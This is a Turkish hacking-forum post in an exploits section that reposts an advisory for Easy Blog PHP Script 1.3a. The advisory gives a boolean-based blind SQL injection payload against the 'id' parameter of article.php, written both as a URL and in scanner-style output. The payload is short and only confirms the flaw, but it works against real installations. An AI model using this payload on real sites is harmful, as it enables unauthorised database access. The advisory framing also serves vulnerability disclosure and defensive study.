1. Duyuruyu Kapat

Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection

'Web Application Exploits' forumunda KaliBot tarafından 29 Eylül 2017 tarihinde açılan konu

  1. KaliBot

    KaliBot Albay

    Katılım:
    30 Haziran 2015
    Mesaj:
    534
    Beğeniler:
    25
    Web Sitesi:
    Kod:
    # Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection
    # Date: 2017-09-27
    # Exploit Author: 8bitsec
    # Vendor Homepage: https://www.codester.com/
    # Software Link: https://www.codester.com/items/4616/easy-blog-php-script
    # Version: 1.3a
    # Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
    # Email: contact@8bitsec.io
    # Contact: https://twitter.com/_8bitsec
    Release Date:
    =============
    2017-09-27
    Product & Service Introduction:
    ===============================
    A simple and easy to setup script that allows you to have your own basic blog that comes packed with professional features.
    Technical Details & Description:
    ================================
    SQL injection on [id] parameter.
    Proof of Concept (PoC):
    =======================
    SQLi:
    http://localhost/[path]/article.php?id=8' AND 7160=7160 AND 'cbgz'='cbgz
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=8' AND 7160=7160 AND 'cbgz'='cbgz
    ==================
    8bitsec - [https://twitter.com/_8bitsec]
     

Bu Sayfayı Paylaş

Share